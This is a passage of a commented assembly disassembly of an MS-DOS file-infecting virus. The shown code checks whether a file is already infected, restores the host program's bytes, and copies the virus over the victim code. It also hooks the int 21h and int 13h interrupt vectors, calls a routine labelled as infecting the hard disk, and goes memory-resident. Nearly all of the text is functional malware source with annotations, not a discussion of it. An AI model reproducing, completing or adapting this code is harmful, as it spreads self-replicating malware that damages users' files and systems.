mov bx,word ptr cs:[32Fh] ;file handle ;0C9F 2E: 8B 1E 032F
|
|||
|
mov dx,0617h ;L_0C82 =file buffer ;0CA4 .BA 0617
|
|||
|
int 21h ;0CA7 CD 21
|
|||
|
|
|||
|
cmp byte ptr cs:[617h],'J' ;infection ptr ;0CA9 2E: 80 3E 0617 4A
|
|||
|
je l_0CB5 ;-> allready infected ;0CAF 74 04
|
|||
|
clc ;0CB1 F8
|
|||
|
jmp short l_0CB6 ;-> ready to infection ;0CB2 EB 02
|
|||
|
nop ;0CB4 90
|
|||
|
|
|||
|
l_0CB5: stc ;<- infected ;0CB5 F9
|
|||
|
l_0CB6: pop es ;0CB6 07
|
|||
|
pop ds ;0CB7 1F
|
|||
|
pop dx ;0CB8 5A
|
|||
|
pop cx ;0CB9 59
|
|||
|
pop bx ;0CBA 5B
|
|||
|
pop ax ;0CBB 58
|
|||
|
retn ;0CBC C3
|
|||
|
s_0C7F endp
|
|||
|
|
|||
|
;=======================================================
|
|||
|
; virus entry point
|
|||
|
;-------------------------------------------------------
|
|||
|
l_0CBD: call s_099E ;Is virus resident ? ;0CBD E8 FCDE
|
|||
|
jnc l_0CE0 ;-> no ;0CC0 73 1E
|
|||
|
|
|||
|
;<- run victim
|
|||
|
mov cx,4 ;changed bytes count ;0CC2 B9 0004
|
|||
|
cld ;0CC5 FC
|
|||
|
mov di,100h ;address ;0CC6 .BF 0100
|
|||
|
call s_0CCC ;0CC9 E8 0000
|
|||
|
|
|||
|
;------ restore victim byte
|
|||
|
s_0CCC proc near
|
|||
|
pop bp ;0CCC 5D
|
|||
|
sub bp,661h ;l_066B=virus begin-100h;0CCD 81 ED 0661
|
|||
|
lea si,[bp+310h] ;l_097B ;0CD1 8D B6 0310
|
|||
|
cld ;0CD5 FC
|
|||
|
rep movsb ;0CD6 F3/ A4
|
|||
|
push cs ;0CD8 0E
|
|||
|
mov ax,offset start ;0CD9 .B8 0100
|
|||
|
push ax ;0CDC 50
|
|||
|
retn 0FFFEh ;0CDD C2 FFFE
|
|||
|
s_0CCC endp
|
|||
|
|
|||
|
;<- virus not resident yet
|
|||
|
l_0CE0: call s_0CE3 ;0CE0 E8 0000
|
|||
|
|
|||
|
;------ make virus resident
|
|||
|
s_0CE3 proc near
|
|||
|
pop bp ;0CE3 5D
|
|||
|
sub bp,678h ;=066Bh = vir_beg-100h ;0CE4 81 ED 0678
|
|||
|
push cs ;0CE8 0E
|
|||
|
pop ds ;0CE9 1F
|
|||
|
push cs ;0CEA 0E
|
|||
|
pop es ;0CEB 07
|
|||
|
mov di,100h ;0CEC .BF 0100
|
|||
|
lea si,[bp+100h] ;virus code begin ;0CEF 8D B6 0100
|
|||
|
cld ;0CF3 FC
|
|||
|
mov cx,5E9h ;virus length ;0CF4 B9 05E9
|
|||
|
rep movsb ;overwrite victim code ;0CF7 F3/ A4
|
|||
|
mov ax,0693h ;= l_0CFB ;0CF9 .B8 0693
|
|||
|
push ax ;0CFC 50
|
|||
|
retn ;0CFD C3
|
|||
|
s_0CE3 endp
|
|||
|
|
|||
|
;---------------------------------------------------------------
|
|||
|
; Run in new place
|
|||
|
;---------------------------------------------------------------
|
|||
|
r_0693: MOV DX,0314h ;=l_097F (Bad command..);0CFE BA1403
|
|||
|
MOV AH,9 ;display string ;0D01 B409
|
|||
|
INT 21h ;0D03 CD21
|
|||
|
PUSH CS ;0D05 0E
|
|||
|
POP DS ;0D06 1F
|
|||
|
MOV AX,3521h ;get int 21h ;0D07 B82135
|
|||
|
INT 21h ;0D0A CD21
|
|||
|
MOV cs:[0304h],BX ;= l_096F ;0D0C 2E891E0403
|
|||
|
MOV cs:[0306h],ES ;= l_0971 ;0D11 2E8C060603
|
|||
|
CLI ;0D16 FA
|
|||
|
XOR AX,AX ;0D17 33C0
|
|||
|
MOV DS,AX ;0D19 8ED8
|
|||
|
MOV ds:[86h],CS ;int 21h segment ;0D1B 8C0E8600
|
|||
|
MOV AX,051Bh ;= l_0B86 ;0D1F B81B05
|
|||
|
MOV ds:[84h],AX ;int 21h offset ;0D22 A38400
|
|||
|
STI ;0D25 FB
|
|||
|
CALL s_09B4 ;Set infection flag ;0D26 E88BFC
|
|||
|
CALL s_09C3 ;contamine hard disk ;0D29 E897FC
|
|||
|
PUSH CS ;0D2C 0E
|
|||
|
POP DS ;0D2D 1F
|
|||
|
|
|||
|
MOV AX,3513h ;get int 13h vector ;0D2E B81335
|
|||
|
INT 21h ;0D31 CD21
|
|||
|
MOV cs:[0308h],BX ;= l_0973 ;0D33 2E891E0803
|
|||
|
MOV cs:[030Ah],ES ;= l_0975 ;0D38 2E8C060A03
|
|||
|
|
|||
|
MOV DX,04ECh ;= l_0B57 ;0D3D BAEC04
|
|||
|
MOV AX,2513h ;set int 13h vector ;0D40 B81325
|
|||
|
INT 21h ;0D43 CD21
|
|||
|
|
|||
|
MOV DX,06E9h ;= l_0D54 ;0D45 BAE906
|
|||
|
MOV CL,4 ;0D48 B104
|
|||
|
SHR DX,CL ;0D4A D3EA
|
|||
|
ADD DX,11h ;+256bytes (+alignement);0D4C 83C211
|
|||
|
MOV AX,3100h ;Terminate&Stay Resident;0D4F B80031
|
|||
|
INT 21h ;0D52 CD21
|
|||
|
|
|||
|
seg_a ends
|
|||
|
|
|||
|
end start
|
|||
|
|